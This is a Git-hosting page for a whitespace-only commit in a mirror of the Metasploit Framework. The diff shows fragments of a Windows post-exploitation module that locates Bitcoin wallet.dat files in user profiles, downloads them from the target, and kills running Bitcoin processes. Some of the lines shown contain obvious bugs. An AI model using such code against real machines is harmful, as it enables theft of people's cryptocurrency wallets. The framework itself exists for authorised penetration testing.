infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Retab bitcoin_jacker.rb

bug/bundler_fix
TabAssassin 2013-12-29 10:59:15 -06:00 committed by Tod Beardsley
parent 6fcd12e36c
commit 9384a466c1
No known key found for this signature in database
GPG Key ID: 1EFFB682ADB9F193
1 changed files with 6 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
modules/post/windows/gather/bitcoin_jacker.rb
View File

@ -18,7 +18,7 @@ class Metasploit3 < Msf::Post
'Name' => 'Windows Gather Bitcoin Wallet', 'Name' => 'Windows Gather Bitcoin Wallet',
'Description' => %q{ 'Description' => %q{
This module downloads any Bitcoin Wallet files from the target This module downloads any Bitcoin Wallet files from the target
system. system.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => [ 'illwill <illwill[at]illmob.org>'], 'Author' => [ 'illwill <illwill[at]illmob.org>'],
@ -32,13 +32,13 @@ class Metasploit3 < Msf::Post
grab_user_profiles().each do |user| grab_user_profiles().each do |user|
next unless user['AppData'] next unless user['AppData']
bitcoin_wallet_path = user['AppData'] + "\\Bitcoin\\wallet.dat" bitcoin_wallet_path = user['AppData'] + "\\Bitcoin\\wallet.dat"
next unless file?(bitcoin_wallet_path) next unless file?(bitcoin_wallet_path)
jack_bitcoin_wallet(bitcoin_wallet_path) jack_bitcoin_wallet(bitcoin_wallet_path)
end end
end end
def jack_bitcoin_wallet(wallet_path) def jack_bitcoin_wallet(wallet_path)
data = "" data = ""
print_status("Wallet found at #{wallet_path}") print_status("Wallet found at #{wallet_path}")
print_status("Jackin' their wallet...") print_status("Jackin' their wallet...")
@ -68,8 +68,8 @@ class Metasploit3 < Msf::Post
def kill_bitcoin def kill_bitcoin
client.sys.process.get_processes().each do |process| client.sys.process.get_processes().each do |process|
pname = process['name'].downcase pname = process['name'].downcase
if pname == "bitcoin.exe" || "bitcoind.exe" if pname == "bitcoin.exe" || "bitcoind.exe"
print_status("#{process['name']} Process Found...") print_status("#{process['name']} Process Found...")
print_status("Killing Process ID #{process['pid']}...") print_status("Killing Process ID #{process['pid']}...")
session.sys.process.kill(x['pid']) rescue nil session.sys.process.kill(x['pid']) rescue nil